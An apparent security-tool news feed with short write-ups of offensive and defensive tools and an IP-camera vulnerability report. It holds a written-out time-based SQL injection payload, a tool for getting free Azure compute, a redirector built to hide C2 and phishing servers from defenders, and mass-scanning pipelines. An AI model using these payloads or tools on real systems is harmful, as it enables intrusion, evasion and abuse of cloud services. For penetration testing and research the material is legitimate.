β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
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-: By Muhammad Danial :-

usage: [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]

Detect SQL injection by sending malicious queries

-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g.,
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads

Running SqliSniper

Single Url Scan

The url can be provided with -u flag for single site scan

./ -u

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./ -r url.txt

piping URLs

The SqliSniper can also worked with the pipeline input with -p flag

cat url.txt | ./ -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d | sort -u | httpx -silent | ./ -p

Scanning with custom payloads

By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

./ -u --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 

Scanning with Single Payloads

If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

./ -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./ -r url.txt --discord <web_hookurl>


Threads can be defined with --threads flag

 ./ -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.

SqliSniper is made inΒ  pythonΒ with lots of <3 by @Muhammad Danial.

Faraday 5.1.0

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R

Execute code within Azure Automation service without getting charged


CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI -
    • Account must be logged in before using this tool


pip install .


usage: [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage




CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian

Clam AntiVirus Toolkit 1.3.0

Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command-line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use in your own software. This is the LTS source code release.

Suricata IDPE 7.0.3

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

SADProtocol goes to Hollywood

By: Zion3R

Faraday’s researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.

This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.

They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:

Product Model Affected Versions
CS-C6N-B0-1G2WF Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR Versions below V5.2.3 build 230217
EZVIZ LC1C Versions below V5.3.4 build 230214

These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:

Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.

This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.

Fwknop Port Knocking Utility 2.6.11

fwknop implements an authorization scheme that requires only a single encrypted packet to communicate various pieces of information, including desired access through a Netfilter policy and/or specific commands to execute on the target system. The main application of this program is to protect services such as SSH with an additional layer of security in order to make the exploitation of vulnerabilities much more difficult. The authorization server works by passively monitoring authorization packets via libpcap.

BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R

BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit project's wiki.


  • Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
  • Easily extendable project structure, everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
  • Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
  • Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
  • Support for multiple proxies with different filter pipelines at one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.


BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators

Rules configuration page may be found here.


At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.

Proxies configuration page may be found here.


Just download latest release from release page, unzip it, edit config file and go on.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot

SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R

Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain

Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or seprately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.

American Fuzzy Lop plus plus 4.10c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R

navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:


navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.


navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.


git clone; cd navgix;
go build


Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - for more information.


  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.


This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]


  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.


To use this script to interact with a GitHub repo, you might run a command like the following:

python --mode repo --url --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.


If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.


Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},

Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R

Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.

Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup


Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023
Challenges In Post-Exploitation Workflows Aug 2, 2023
On (Structured) Data Jul 26, 2023


Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.

Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances

Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments

Tool Usage

Researched and Developed By Aditya K Sood and Rohit BansalΒ 

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R

Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.

SAP Router

SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:

sncscan -H -S 3299 -p router


The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background

sncscan -H -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/,/H/ 

Through SAP Router

sncscan --route-string /H/ -p diag


Requirements: Currently the sncscan only works with the pysap libary from our fork.

python3 -m pip install -r requirements.txt


python3 test
python3 install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: Minimum security level required for SNC connections.
  • snc/data_protection/max: highest security level, initiated by the SAP system
  • snc/data_protection/use: default security level, initiated from the SAP system

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.

OpenSSL Toolkit 3.2.1

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide. The latest stable version is the 3.2 series supported until 23rd November 2025.

OpenSSL Toolkit 3.1.5

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide. The 3.1 series is supported until 14th March 2025.

OpenSSL Toolkit 3.0.13

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide. The 3.0 series is a Long Term Support (LTS) version and is supported until 7th September 2026.